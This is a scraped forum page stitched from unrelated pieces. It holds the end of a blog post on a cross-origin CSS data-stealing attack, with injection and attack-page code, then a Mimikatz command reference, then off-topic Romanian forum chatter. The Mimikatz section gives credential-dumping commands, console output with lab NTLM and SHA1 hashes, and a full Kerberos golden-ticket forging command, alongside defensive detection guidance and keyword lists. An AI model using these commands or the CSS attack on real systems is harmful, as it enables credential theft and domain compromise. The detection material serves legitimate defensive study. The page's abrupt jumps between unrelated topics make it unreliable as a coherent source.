<!DOCTYPE html asfdasfdadf> <html> <head> <link rel="stylesheet" href="incorrectMime.php?type=plain"> </head> <div id="text"> This text should be red <br> </div> Injection point: {}extract{font-family:' secret goes here'} </html> view rawinjectme.html hosted with ❤ by GitHub Which means we effectively have a page that when interpreted as CSS will have a font-family name of "secret goes here". It looks good, all we need to do now is host this injected page on a page under our control and extract the CSS property using JavaScript. Extraction In order to get hold of the font-family name we just created we need to host the injected page as a CSS Stylesheet also remembering that we need to force the style sheet to be loaded under Quirks Mode! So pay attention to the DTD of the attack page. Here's the little page I prepared for this example: <!DOCTYPE afdssadfsafdd> <html> <head> <link charset="utf-8" type="text/css" rel="stylesheet" href="injectme.php?injectme=%0A{}extract{font-family:'"> </head> <body> adsfassdf </body> </html> view rawxcs_attack.html hosted with ❤ by GitHub Once its loaded up we can extract any CSS properties by using the following DOM path: document.styleSheets.cssRules[j].cssText Where i,j are the indices needed to reach the desired cssText property. In our case it will be i=j=0. Where's what it looks like when the information has been extracted correctly and loaded up into the DOM for extraction: Secret extracted successfully as a font-family name Boom! Secret extracted game over References and Further Reading Lin-Shung Huang, Lin-Shung Huang, Chris Evans, Collin Jackson; Protecting Browsers from Cross-Origin CSS Attacks https://www.linshunghuang.com/papers/css.pdf [ACM Conference on Computer and Communications Security (CCS) 2010] Wikipedia , Quirks Mode https://en.wikipedia.org/wiki/Quirks_mode [retrieved 2/14/2016] @filedescriptor Cross-Origin CSS Attacks Revisited (feat. UTF-16) http://blog.innerht.ml/cross-origin-css-attacks-revisited-feat-utf-16/ [retrieved 2/14/2016] Mozilla Developer Network, Quirks Mode and Standards Mode https://developer.mozilla.org/en-US/docs/Quirks_Mode_and_Standards_Mode [retrieved 2/14/2016] Mozilla Developer Network, Mozilla Quirks Mode Behavior https://developer.mozilla.org/en-US/docs/Mozilla_Quirks_Mode_Behavior [retrieved 2/14/2016] CVE-2015-5826 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5826 CVE-2015-1287 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1287 Posted by Keith Makan at 11:00 Sursa: http://blog.k3170makan.com/2016/02/stealing-secrets-with-css-cross-origin.html

Unofficial Guide to Mimikatz & Command Reference Mimikatz Command Reference Version: Mimikatz 2.0 alpha 20151113 (oe.eo) edition [11/13/2015] Page last updated: 1/05/2016 Introduction: It seems like many people on both sides of the fence, Red & Blue, aren’t familiar with most of Mimikatz’s capabilities, so I put together this information on all the available commands I could find. I plan to update as I can with additional content about the most useful commands. This way both Red & Blue teams better understand the full capability and are better able to secure the enterprises they are hired to protect. I developed this reference after speaking with a lot of people, hired to both defend, and attack, networks and I learned that outside of a couple of the top 3 used Mimikatz commands, not many knew about the full capability of Mimikatz. This page details as best as possible what each command is, how it works, the rights required to run it, the parameters (required & optional), as well as screenshots and additional context (where possible). There are several I haven’t delved fully into, but expect to in the near future. While I will continue to post articles to ADSecurity.org about different aspects of Mimikatz usage, I plan to keep this as updated and as comprehensive as possible. This information is provided to help organizations better understand Mimikatz capability and is not to be used for unlawful activity. Do NOT use Mimikatz on computers you don’t own or have been allowed/approved to. In other words, don’t pen-test/red-team systems with Mimikatz without a “get out of jail free card”. This page and all content contained within is not to be reproduced in whole or part without express written consent by this page’s author. I did not write Mimikatz and therefore have no special insight. All of the information on this page is derived from using Mimikatz, reading the source code, conversations with Benjamin, his blog & GitHub pages, and my own work/research. Any errors on this page are my own only. Send comments/kudus here. Many thanks to Benjamin Delpy for writing and continuously updating Mimikatz. His work has greatly improved the security of Windows, especially Windows 10. Mimikatz Overview: Mimikatz is one of the best tools to gather credential data from Windows systems. In fact I consider Mimikatz to be the “Swiss army knife” (or multi-tool) of Windows credentials – that one tool that can do everything. Since the author of Mimikatz, Benjamin Delpy, is French most of the resources describing Mimikatz usage is in French, at least on his blog. The Mimikatz GitHub repository is in English and includes useful information on command usage. Mimikatz is a Windows x32/x64 program coded in C by Benjamin Delpy (@gentilkiwi) in 2007 to learn more about Windows credentials (and as a Proof of Concept). There are two optional components that provide additional features, mimidrv (driver to interact with the Windows kernal) and mimilib (AppLocker bypass, Auth package/SSP, password filter, and sekurlsa for WinDBG). Mimikatz requires administrator or SYSTEM and often debug rights in order to perform certain actions and interact with the LSASS process (depending on the action requested). The Mimikatz.exe contains, or at least should contain, all capability noted there. Mimikatz capability can be leveraged by compiling and running your own version, running the Mimikatz executable, leveraging the MetaSploit script, the official Invoke-Mimikatz PowerShell version, or one of the dozen of Mimikatz PowerShell variants (I happen to be partial to PowerShell Empire, because Empire is awesome!). The Mimikatz source code and release binaries are available on GitHub and is licensed under Creative Commons with the following detail: You are free to: * Share — copy and redistribute the material in any medium or format * Adapt — remix, transform, and build upon the material * for any purpose, even commercially. The licensor cannot revoke these freedoms as long as you follow the license terms. Attribution — You must give appropriate credit, provide a link to the license, and indicate if changes were made. You may do so in any reasonable manner, but not in any way that suggests the licensor endorses you or your use. No additional restrictions — You may not apply legal terms or technological measures that legally restrict others from doing anything the license permits. Mimikatz Author(s): Benjamin DELPY gentilkiwi, you can contact him on Twitter ( @gentilkiwi ) or by mail ( benjamin [at] gentilkiwi.com ) DCSync function in lsadump module was co-written with Vincent LE TOUX, you contact him by mail ( vincent.letoux [at] gmail.com ) or visit his website (http://www.mysmartlogon.com ) “Official” Mimikatz Links: Mimikatz GitHub Location (Source Code) Mimikatz Releases (includes binaries) Mimikatz GitHub Wiki (Documentation, some of which is reproduced here) GentilKiwi Blog (much of it is in French, use Chrome/other for translation) Mimikatz & Credentials: After a user logs on, a variety of credentials are generated and stored in the Local Security Authority Subsystem Service, LSASS, process in memory. This is meant to facilitate single sign-on (SSO) ensuring a user isn’t prompted each time resource access is requested. The credential data may include NTLM password hashes, LM password hashes (if the password is <15 characters), and even clear-text passwords (to support WDigest and SSP authentication among others. While you can prevent a Windows computer from creating the LM hash in the local computer SAM database (and the AD database), this doesn’t prevent the system from generating the LM hash in memory. By default, Windows Server 2008 and Windows Vista no longer generate LM hashes for users unless explicitly enabled. Starting with Windows 8.1 and Windows Server 2012 R2, the LM hash and “clear-text” password are no longer in memory. This functionality was also “back-ported” to earlier versions of Windows (Windows 7/8/2008R2/2012) in kb2871997, though in order to prevent the “clear-text” password from being placed in LSASS, the following registry key needs to be set to “0” (Digest Disabled): HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest “UseLogonCredential”(DWORD) This registry key is worth monitoring in your environment since an attacker may wish to set it to 1 to enable Digest password support which forces “clear-text” passwords to be placed in LSASS on any version of Windows from Windows 7/2008R2 up to Windows 10/2012R2. Windows 8.1/2012 R2 and newer do not have a “UseLogonCredential” DWORD value, so it would have to be created. The existence of this key on these systems may indicate a problem. Note that running code directly on a target system is rarely desirable for an attacker, so Mimikatz is continuously updated with new capability to be run remotely. This include running Mimikatz remotely against a remote system to dump credentials, using Invoke-Mimikatz remotely with PowerShell Remoting, and DCSync, the latest feature to grab password data for any Active Directory account in the domain remotely against a DC without any Mimikatz code being run on the DC (it uses Microsoft’s Domain Controller official replication APIs, once the correct rights are attained). Available Credentials by OS: Benjamin Delpy posted an Excel chart on OneDrive (shown below) that shows what type of credential data is available in memory (LSASS), including on Windows 8.1 and Windows 2012 R2 which have enhanced protection mechanisms reducing the amount and type of credentials kept in memory. (Click image to embiggen) PowerShell & Mimikatz: The majority of Mimikatz functionality is available in PowerSploit (PowerShell Post-Exploitation Framework) through the “Invoke-Mimikatz” PowerShell script (written byJoseph Bialek) which “leverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as dump credentials without ever writing the Mimikatz binary to disk.” Note that the PowerSploit framework is now hosted in the “PowerShellMafia” GitHub repository. What gives Invoke-Mimikatz its “magic” is the ability to reflectively load the Mimikatz DLL (embedded in the script) into memory. The Invoke-Mimikatz code can be downloaded from the Internet (or intranet server), and executed from memory without anything touching disk. Furthermore, if Invoke-Mimikatz is run with the appropriate rights and the target computer has PowerShell Remoting enabled, it can pull credentials from other systems, as well as execute the standard Mimikatz commands remotely, without files being dropped on the remote system. Invoke-Mimikatz is not updated when Mimikatz is, though it can be (manually). One can swap out the DLL encoded elements (32bit & 64bit versions) with newer ones. Will Schroeder (@HarmJ0y) has information on updating the Mimikatz DLLs in Invoke-Mimikatz (it’s not a very complicated process). The PowerShell Empire version of Invoke-Mimikatz is usually kept up to date. Use mimikatz to dump credentials out of LSASS: Invoke-Mimikatz -DumpCreds Use mimikatz to export all private certificates (even if they are marked non-exportable): Invoke-Mimikatz –DumpCerts Elevate privilege to have debug rights on remote computer: Invoke-Mimikatz -Command “privilege::debug exit” -ComputerName “computer1” The Invoke-Mimikatz “Command” parameter enables Invoke-Mimikatz to run custom Mimikatz commands. Defenders should expect that any functionality included in Mimikatz is available in Invoke-Mimikatz. Detecting Mimikatz: There are several ways to potentially detect Mimikatz use on a network, though none are guaranteed. Since Mimikatz’s source code is on GitHub, anyone with Visual Studio can compile their own version. I built my own version of Mimikatz called “kitikatz” by replacing all instances of “mimikatz” with “kitikatz” and the detection rate at VirusTotal was not good (4/54). Windows Defender on my Windows 10 system detected it. I then replaced “Benjamin Delpy” and “gentilkiwi” with the same words, just replacing the e’s with 3’s and the i’s with 1’s. The detection rate was still poor (4/54). Windows Defender on my Windows 10 system did not detect it. So, your mileage will vary regarding detection. Benjamin Delpy publishes YARA rules for Mimikatz on the Mimkatz GitHub repository. Run AntiVirus software with the latest definition files. According to VirusTotal, the mimikatz.exe dated 11/11/2015 (32bit & 64bit) is detected by 35/35 of the AV engines. Renaming the file doesn’t change the scan results. Note that Benjamin has noted real-world results to be less successful. However, AV will usually flag the known bad files. AntiVirus is part of foundational security – the first layer in “defense in depth”. Mimikatz (as of October) activates attached BusyLights. [implemented in Mimikatz version 2.0 alpha 20151008 (oe.eo) edition] Leverage security software to identify processes that interact with LSASS. Security software that monitors for process injection may also be able to regularly detect Mimikatz use. HoneyTokens/HoneyHashes involves placing special credentials in memory on a number of computers in the enterprise. These credentials are flagged so when anyone attempts to use them, a critical alert goes out. this requires some sort of push method as well as placing credentials that are attractive to an attacker. In theory, this could detect credential theft and use in the environment. If the WDIGEST registry key (HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest) is supposed to be set to “0” in the enterprise to prevent “clear-text” passwords from being stored in LSASS and there are systems where it was switched to “1”, this may be indicative of credential theft activity. This registry key is worth monitoring in your environment since an attacker may wish to set it to 0 to enable Digest password support which forces “clear-text” passwords to be placed in LSASS on any version of Windows from Windows 7/2008R2 up to Windows 10/2012R2 (probably 2016 as well). Forged Kerberos ticket detection is covered on this page I published in early 2015. These methods can detect Golden Tickets, Silver Tickets, and Trust Tickets. I also have information on how to detect MS14-068 Kerberos vulnerability exploitation. Enable LSA Protection on all Windows versions in the enterprise that supports it. This prevents Mimikatz from working “out-of-the-box” and requires use of the Mimikatz driver which logs events when it interacts with LSASS. Mimikatz & LSA Protection: Windows Server 2012 R2 and Windows 8.1 includes a new feature called LSA Protection which involves enabling LSASS as a protected process on Windows Server 2012 R2 (Mimikatz can bypass with a driver, but that should make some noise in the event logs): The LSA, which includes the Local Security Authority Server Service (LSASS) process, validates users for local and remote sign-ins and enforces local security policies. The Windows 8.1 operating system provides additional protection for the LSA to prevent reading memory and code injection by non-protected processes. This provides added security for the credentials that the LSA stores and manages. Enabling LSA protection: Open the Registry Editor (RegEdit.exe), and navigate to the registry key that is located at: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa and Set the value of the registry key to: “RunAsPPL”=dword:00000001. Create a new GPO and browse to Computer Configuration, Preferences, Windows Settings. Right-click Registry, point to New, and then click Registry Item. The New Registry Properties dialog box appears. In the Hive list, click HKEY_LOCAL_MACHINE. In the Key Path list, browse to SYSTEM\CurrentControlSet\Control\Lsa. In the Value name box, type RunAsPPL. In the Value type box, click the REG_DWORD. In the Value data box, type 00000001.Click OK. LSA Protection prevents non-protected processes from interacting with LSASS. Mimikatz can still bypass this with a driver (“!+”). Detecting Invoke-Mimikatz: Ensure all Windows systems have PowerShell v3 or newer. Newer versions of PowerShell have better logging features, especially PowerShell v5. Enable PowerShell Module Logging via Group Policy: Computer Configuration, Policies, Administrative Templates, Windows Components, and Windows PowerShell,Turn on Module Logging. Enter “*” and click OK. This will log all PowerShell activity including all PowerShell modules. PowerShell activity will be logged to the PowerShell Operational Log. Push or pull these events to a central logging server (via Windows Event Forwarding or similar) or SIEM. Parse PowerShell events for the following: “System.Reflection.AssemblyName” “System.Reflection.Emit.AssemblyBuilderAccess “ “System.Runtime.InteropServices.MarshalAsAttribute” “TOKEN_PRIVILEGES” “SE_PRIVILEGE_ENABLED“ Note: While it may be possible to identify Mimikatz usage by alerting on “mimikatz”, “Delpy”, or “gentilkiwi”, a “sophisticated” attacker will likely roll their own version of Mimikatz or Invoke-Mimikatz without these keywords. Detecting Offensive PowerShell Tools: Many PowerShell offensive tools use the following calls which are logged in PowerShell Module Logging. “GetDelegateForFunctionPointer” “System.Reflection.AssemblyName“ “System.Reflection.Emit.AssemblyBuilderAccess“ “System.Management.Automation.WindowsErrorReporting” “MiniDumpWriteDump” “TOKEN_IMPERSONATE” “TOKEN_DUPLICATE” “TOKEN_ADJUST_PRIVILEGES” “TOKEN_PRIVILEGES” “Sneaky” Mimikatz Execution: Casey Smith (@subtee & blog) has done a LOT of work showing how application whitelisting is not the panacea many believe it to be. Despite that, application whitelisting is a solid layer in a defense in depth strategy. Casey also has come up with many creative and sneaky ways to execute Mimikatz. Execute Mimikatz Inside of RegSvcs or RegAsm – .NET utilities Proof of Concept Mimikatz packed & hidden in an image file Downloads and Executes Mimikatz In Memory From GitHub Most Popular Mimikatz Commands: Here are just some of the most popular Mimikatz command and related functionality. CRYPTO::Certificates – list/export certificates KERBEROS::Golden – create golden/silver/trust tickets KERBEROS::List – List all user tickets (TGT and TGS) in user memory. No special privileges required since it only displays the current user’s tickets.Similar to functionality of “klist”. KERBEROS::PTT – pass the ticket. Typically used to inject a stolen or forged Kerberos ticket (golden/silver/trust). LSADUMP::DCSync – ask a DC to synchronize an object (get password data for account). No need to run code on DC. LSADUMP::LSA – Ask LSA Server to retrieve SAM/AD enterprise (normal, patch on the fly or inject). Use to dump all Active Directory domain credentials from a Domain Controller or lsass.dmp dump file. Also used to get specific account credential such as krbtgt with the parameter /name: “/name:krbtgt” LSADUMP::SAM – get the SysKey to decrypt SAM entries (from registry or hive). The SAM option connects to the local Security Account Manager (SAM) database and dumps credentials for local accounts. This is used to dump all local credentials on a Windows computer. LSADUMP::Trust – Ask LSA Server to retrieve Trust Auth Information (normal or patch on the fly). Dumps trust keys (passwords) for all associated trusts (domain/forest). MISC::AddSid – Add to SIDHistory to user account. The first value is the target account and the second value is the account/group name(s) (or SID). MISC::MemSSP – Inject a malicious Windows SSP to log locally authenticated credentials. MISC::Skeleton – Inject Skeleton Key into LSASS process on Domain Controller. This enables all user authentication to the Skeleton Key patched DC to use a “master password” (aka Skeleton Keys) as well as their usual password. PRIVILEGE::Debug – get debug rights (this or Local System rights is required for many Mimikatz commands). SEKURLSA::Ekeys – list Kerberos encryption keys SEKURLSA::Kerberos – List Kerberos credentials for all authenticated users (including services and computer account) SEKURLSA::Krbtgt – get Domain Kerberos service account (KRBTGT)password data SEKURLSA::LogonPasswords – lists all available provider credentials. This usually shows recently logged on user and computer credentials. SEKURLSA::Pth – Pass- theHash and Over-Pass-the-Hash SEKURLSA::T`ickets – Lists all available Kerberos tickets for all recently authenticated users, including services running under the context of a user account and the local computer’s AD computer account. Unlike kerberos::list, sekurlsa uses memory reading and is not subject to key export restrictions. sekurlsa can access tickets of others sessions (users). TOKEN::List – list all tokens of the system TOKEN::Elevate – impersonate a token. Used to elevate permissions to SYSTEM (default) or find a domain admin token on the box TOKEN::Elevate /domainadmin – impersonate a token with Domain Admin credentials. ADSecurity Mimikatz Posts: All posts mentioning Mimikatz: ADSecurity.org Mimikatz Posts Mimikatz and Active Directory Kerberos Attacks“ Dump Clear-Text Passwords for All Admins in the Domain Using Mimikatz DCSync How Attackers Use Kerberos Silver Tickets to Exploit Systems Mimikatz DCSync Usage, Exploitation, and Detection Sneaky Active Directory Persistence #12: Malicious Security Support Provider (SSP) Sneaky Active Directory Persistence #11: Directory Service Restore Mode (DSRM) Kerberos Golden Tickets are Now More Golden It’s All About Trust – Forging Kerberos Trust Tickets to Spoof Access across Active Directory Trusts Detecting Mimikatz Use Mimikatz Command Guide: Mimikatz can be executed in interactive mode by simply running “Mimikatz.exe” or pass it a command and exit (example: ‘Mimikatz “kerberos::list” exit’). Invoke-Mimikatz does not have an interactive mode. Mimikatz can be used to pass commands from the command line to Mimikatz for processing in order which is useful for Invoke-Mimikatz or when using Mimikatz in scripts. Appending “exit” exits Mimikatz after the last command is executed (do this so Mimikatz exits gracefully). PS C:\temp\mimikatz> .\mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit .#####. mimikatz 2.0 alpha (x64) release "Kiwi en C" (Nov 13 2015 00:44:32) .## ^ ##. ## / \ ## /* * * ## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo) '#####' with 17 modules * * */ mimikatz(commandline) # privilege::debug Privilege '20' OK mimikatz(commandline) # sekurlsa::logonpasswords Authentication Id : 0 ; 646260 (00000000:0009dc74) Session : RemoteInteractive from 2 User Name : adsadministrator Domain : ADSECLAB Logon Server : ADSDC03 Logon Time : 11/27/2015 11:41:27 AM SID : S-1-5-21-1581655573-3923512380-696647894-500 msv : [00000003] Primary * Username : ADSAdministrator * Domain : ADSECLAB * NTLM : 5164b7a0fda365d56739954bbbc23835 * SHA1 : f8db297cb2ae403f8915675cebe79643d0d3b09f [00010000] CredentialKeys * NTLM : 5164b7a0fda365d56739954bbbc23835 * SHA1 : f8db297cb2ae403f8915675cebe79643d0d3b09f tspkg : wdigest : * Username : ADSAdministrator * Domain : ADSECLAB * Password : (null) kerberos : * Username : adsadministrator * Domain : LAB.ADSECURITY.ORG * Password : (null) ssp : KO The interactive mode provides a “Mimikatz console” where commands can be entered and executed in real-time: PS C:\temp\mimikatz> .\mimikatz .#####. mimikatz 2.0 alpha (x64) release "Kiwi en C" (Nov 13 2015 00:44:32) .## ^ ##. ## / \ ## /* * * ## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo) '#####' with 17 modules * * */ mimikatz # privilege::debug Privilege '20' OK mimikatz # sekurlsa::logonpasswords Authentication Id : 0 ; 646260 (00000000:0009dc74) Session : RemoteInteractive from 2 User Name : adsadministrator Domain : ADSECLAB Logon Server : ADSDC03 Logon Time : 11/27/2015 11:41:27 AM SID : S-1-5-21-1581655573-3923512380-696647894-500 msv : [00000003] Primary * Username : ADSAdministrator * Domain : ADSECLAB * NTLM : 5164b7a0fda365d56739954bbbc23835 * SHA1 : f8db297cb2ae403f8915675cebe79643d0d3b09f [00010000] CredentialKeys * NTLM : 5164b7a0fda365d56739954bbbc23835 * SHA1 : f8db297cb2ae403f8915675cebe79643d0d3b09f tspkg : wdigest : * Username : ADSAdministrator * Domain : ADSECLAB * Password : (null) kerberos : * Username : adsadministrator * Domain : LAB.ADSECURITY.ORG * Password : (null) ssp : KO credman : Mimikatz Command Reference: Mimikatz Modules: CRYPTO CRYPTO::Certificates DPAPI EVENT KERBEROS Golden Tickets Silver Tickets Trust Tickets KERBEROS::PTT LSADUMP DCSync LSADUMP::LSA LSADUMP::SAM LSADUMP::Trust MISC MINESWEEPER NET PRIVILEGE PRIVILEGE::Debug PROCESS SERVICE SEKURLSA SEKURLSA::Kerberos SEKURLSA::Krbtgt SEKURLSA::LogonPasswords SEKURLSA::Pth STANDARD TOKEN TOKEN::Elevate TOKEN::Elevate /domainadmin TS VAULT NOTE: Any item marked “experimental” should only be used in test environments. CRYPTO The CRYPTO Mimikatz module provides advanced capability to interface with Windows cryptographic functions (CryptoAPI). Typical use is to export certificates that aren’t marked as “exportable.” CRYPTO::CAPI– (experimental) Patch CryptoAPI layer for easy export CRYPTO::Certificates – list/export certificates Carlos Perez (aka DarkOperator) has a great blog post on using Mimikatz to export certificates. This command lists certificates and properties of theirs keys. It can export certificates too. Typically requires “privilege::debug” /systemstore – optional – the system store that must be used (default: CERT_SYSTEM_STORE_CURRENT_USER) /store – optional – the store that must be used to list/export certificates (default: My) – full list with crypto::stores /export – optional – export all certificates to files (public parts in DER, private parts in PFX files – password protected with: mimikatz) Benjamin’s comments on CRYPTO:Certificates: See crypto::stores for valid systemstore list, and its output for store list. Non exportable keys (with KO - ERROR kuhl_m_crypto_exportCert ; Export / CreateFile (0x8009000b)) can often be exported with crypto::capiand/or crypto::cng Despite crypto::capi or crypto::cng patch, you must have correct ACL on filesystem to access private keys (UAC… ) Some smartcard crypto providers can report a successfull private export (it’s not, of course ) CRYPTO::CNG– (experimental) Patch CNG service for easy export (patches “KeyIso” service) CRYPTO::Hash – hash a password (with optional user name) CRYPTO::Keys– list/export keys containers CRYPTO::Providers – list cryptographic providers CRYPTO::Stores – list cryptographic stores /systemstore – optional – the system store that must be used to list stores (default: CERT_SYSTEM_STORE_CURRENT_USER) Store Options: CERT_SYSTEM_STORE_CURRENT_USER or CURRENT_USER CERT_SYSTEM_STORE_CURRENT_USER_GROUP_POLICY or USER_GROUP_POLICY CERT_SYSTEM_STORE_LOCAL_MACHINE or LOCAL_MACHINE CERT_SYSTEM_STORE_LOCAL_MACHINE_GROUP_POLICY or LOCAL_MACHINE_GROUP_POLICY CERT_SYSTEM_STORE_LOCAL_MACHINE_ENTERPRISE or LOCAL_MACHINE_ENTERPRISE CERT_SYSTEM_STORE_CURRENT_SERVICE or CURRENT_SERVICE CERT_SYSTEM_STORE_USERS or USERS CERT_SYSTEM_STORE_SERVICES or SERVICES DPAPI DPAPI::Blob – Unprotect a DPAPI blob with API or Masterkey DPAPI:Cache DPAPI::CAPI – CAPI key test DPAPI::CNG – CNG key test DPAPI::Cred – CRE test DPAPI::CredHist – Configure a Credhist file DPAPI::MasterKey – Configure a Masterkey file, unprotect (key depending) DPAPI::Protect – Protect data using DPAPI DPAPI::Vault – VAULT test EVENT EVENT::Clear – Clear an event log EVENT:::Drop – (experimental) Patch Events service to avoid new events KERBEROS The KERBEROS Mimikatz module is used to interface with the official Microsoft Kerberos API. No special rights are required for the commands in this module. KERBEROS::Clist – list tickets in MIT/Heimdall ccache KERBEROS::Golden – create golden/silver/trust tickets The capability of this command is based on the password hash type retrieved. Type Requirement Scope Golden KRBTGT hash Domain/Forest Silver Service hash Service Trust Trust hash Domain/Forest -> Domain/Forest (based on account access) Golden Ticket A Golden Ticket is a TGT using the KRBTGT NTLM password hash to encrypt and sign. A Golden Ticket (GT) can be created to impersonate any user (real or imagined) in the domain as a member of any group in the domain (providing a virtually unlimited amount of rights) to any and every resource in the domain. Since the Golden Ticket is an authentication ticket (TGT described below), its scope is the entire domain (and the AD forest by leveraging SID History) since the TGT is used to get service tickets (TGS) used to access resources. The Golden Ticket (TGT) contains user group membership information (PAC) and is signed and encrypted using the domain’s Kerberos service account (KRBTGT) which can only be opened and read by the KRBTGT account. To summarize, once an attacker gets access to the KRBTGT password hash, they can create Golden Tickets (TGT) that provide access to anything in AD at any time. Mimikatz Golden Ticket Command Reference: The Mimikatz command to create a golden ticket is “kerberos::golden” /domain – the fully qualified domain name. In this example: “lab.adsecurity.org”. /sid – the SID of the domain. In this example: “S-1-5-21-1473643419-774954089-2222329127”. /sids – Additional SIDs for accounts/groups in the AD forest with rights you want the ticket to spoof. Typically, this will be the Enterprise Admins group for the root domain “S-1-5-21-1473643419-774954089-5872329127-519”. This parameter adds the provided SIDs to the SID History parameter. /user – username to impersonate /groups (optional) – group RIDs the user is a member of (the first is the primary group). Add user or computer account RIDs to receive the same access. Default Groups: 513,512,520,518,519 for the well-known Administrator’s groups (listed below). /krbtgt – NTLM password hash for the domain KDC service account (KRBTGT). Used to encrypt and sign the TGT. /ticket (optional) – provide a path and name for saving the Golden Ticket file to for later use or use /ptt to immediately inject the golden ticket into memory for use. /ptt – as an alternate to /ticket – use this to immediately inject the forged ticket into memory for use. /id (optional) – user RID. Mimikatz default is 500 (the default Administrator account RID). /startoffset (optional) – the start offset when the ticket is available (generally set to –10 or 0 if this option is used). Mimikatz Default value is 0. /endin (optional) – ticket lifetime. Mimikatz Default value is 10 years (~5,262,480 minutes). Active Directory default Kerberos policy setting is 10 hours (600 minutes). /renewmax (optional) – maximum ticket lifetime with renewal. Mimikatz Default value is 10 years (~5,262,480 minutes). Active Directory default Kerberos policy setting is 7 days (10,080 minutes). /sids (optional) – set to be the SID of the Enterprise Admins group in the AD forest ([ADRootDomainSID]-519) to spoof Enterprise Admin rights throughout the AD forest (AD admin in every domain in the AD Forest). /aes128 – the AES128 key /aes256 – the AES256 key Golden Ticket Default Groups: Domain Users SID: S-1-5-21<DOMAINID>-513 Domain Admins SID: S-1-5-21<DOMAINID>-512 Schema Admins SID: S-1-5-21<DOMAINID>-518 Enterprise Admins SID: S-1-5-21<DOMAINID>-519 (this is only effective when the forged ticket is created in the Forest root domain, though add using /sids parameter for AD forest admin rights) Group Policy Creator Owners SID: S-1-5-21<DOMAINID>-520 kerberos::golden /admin:ADMIINACCOUNTNAME /domain:DOMAINFQDN /id:ACCOUNTRID /sid:DOMAINSID /krbtgt:KRBTGTPASSWORDHASH /ptt Command Example: .\mimikatz “kerberos::golden /admin:DarthVader /domain:rd.lab.adsecurity.org /id:9999 /sid:S-1-5-21-135380161-102191138-581311202 /krbtgt:13026055d01f235d67634e109da03321 /startoffset:0 /endin:600 /renewmax:10080 /ptt” exit Golden Ticket References: * Golden Tickets are now More Golden (with SID History) Update1/5/2016: In early January 2015, I shared with customers indicators for detecting forged Kerberos tickets and subsequently presented this information at BSides Charm 2015. Soon after, Mimikatz was updated with a domain field that was set to static values, usually containing the string “eo.oe”. As of the Mimikatz update dated 1/5/2016, forged Kerberos tickets no longer include a domain anomaly since the netbios domain name is placed in the domain component of the Kerberos ticket. Mimikatz code diff: More information on the difficulty of detecting forged Kerberos tickets (Golden Tickets, Silver Tickets, etc) in the in the Detecting Forged Kerberos Tickets section. Articol complet: https://adsecurity.org/?page_id=1821

Cere toate datele clientului + nr de telefon . Curierul o sa trebuiasca sa il sune daca nu este acasa de exemplu. Nu e problema, si eu am esuat de multe ori..dar asa inveti..stai linistit.

Am vrut sa-ti scriu ceva dar mi-am dat seama suficient de repede ca nu se merita. Intram in polemici aiurite. Imi sterg si postul initial.

Exista design si pe hartie, nu doar pe calculator

@Che Daca ma iau dupa ce zice lumea pe internet nu mai faceam un ban toata viata mea. Asta de mai sus daca a scos doar 200 de dolari intr-un an inseamna ca e jalnic la ce facea, pe bune. Eu tratez site-urile mele ca si afacerea mea, care daca stau bine si ma gandesc chiar este si muncesc zi si noapte pentru ea pentru ca ma simt euforic, este businessul meu daca nu muncesc eu pentru mine atunci cine o sa o faca?! Is bucuros in fiecare dimineata cand vad ca peste noapte s-a mai vandut ceva, asta ma impinge sa muncesc din ce in ce mai mult. In dimineata asta de exemplu m-am trezit si am vazut ca am mai facut 123 $ cat AM DORMIT, asta e de ajuns pentru mine incat sa ma faca sa muncesc mai mult astazi. Observ ca la inceput eram mai stresat in legatura cu clientii si cum trebuia sa stau de vorba cu ei, acum mi-am intrat in mana...creez relatii cu clientii fara sa vreau. Toti or sa spuna ca x a murit...sau ca y nu mai merge, lasa-i sa spuna, e in avantajul tau....ai mai putina competitie pentru ca sunt pitigoi deastia care apleaca urechea la tot ce zboara. Numai Bine.

te pui cu forumistii ... experti in fizica cuantica, robotica, cibernetica, drept civil si mari cunoscatori de femei bune ... (mai ales astia de nu au nici 16 ani)

Haideti sa va spun eu cum este in Germania. Vin acasa cu mandat de confiscare a "sculelor". In ciuda faptului ca au mandat si le pot confisca pentru investigatie (fara intrebari), isi cer scuze pentru deranj, intreaba daca esti de acord sa le ia si daca folosesti tehnologii pentru criptografie. Daca spui ca folosesti, intreaba daca vrei sa le dai parolele pentru access. Toate astea ei le noteaza si tin cont de faptul daca ai cooperat sau nu. De exemplu, daca ei cauta ceva pentru o frauda informatica, si nu vor gasi nimic, daca cooperezi, nu o sa se lege de tine pentru altceva. (aplicatii diverse, filme, muzica, etc). Daca nu cooperezi, sunt toate sansele sa se lege si de alea. Cu tehnologia e mai greu, ma gandesc ca daca nu au astia in Germania, aia din Romania s-ar uita la un scsi ca proasta la p**a. Pentru criptografie au tool-uri profesionale, asta garantat. Gandindu-ma la ce dezvoltata este Romania (lol ma), si cum functioneaza acolo protectia sociala si drepturile persoanelor private, ei pot face si altceva: Te ia, iti da 400 de pulane, ia un boschetar, il platesc pe ala, il pun de martor ca a asistat la mai stiu eu ce "cyber furtisag" si aia e tot. Daca aveti ceva documente de tinut, le puteti tine in flash-ul de la imprimanta sau in mp3. // offtopic @Paul4games: In Romania nu-i zice "Politie". Poate pulitie sau militie, iar la militieni le zice militisti =) Stiti unitatea de masura a prostiei ? E, unitatea de masura a prostiei este tianul si are ca multiplii: decitianul, centitianul si militianul.

@immun3: Înseamn? c? cei de la RSA sunt ni?te idio?i. Not. @waingro: O d?m pe criptografie f?r? s? avem habar de func?ii? Fii serios.

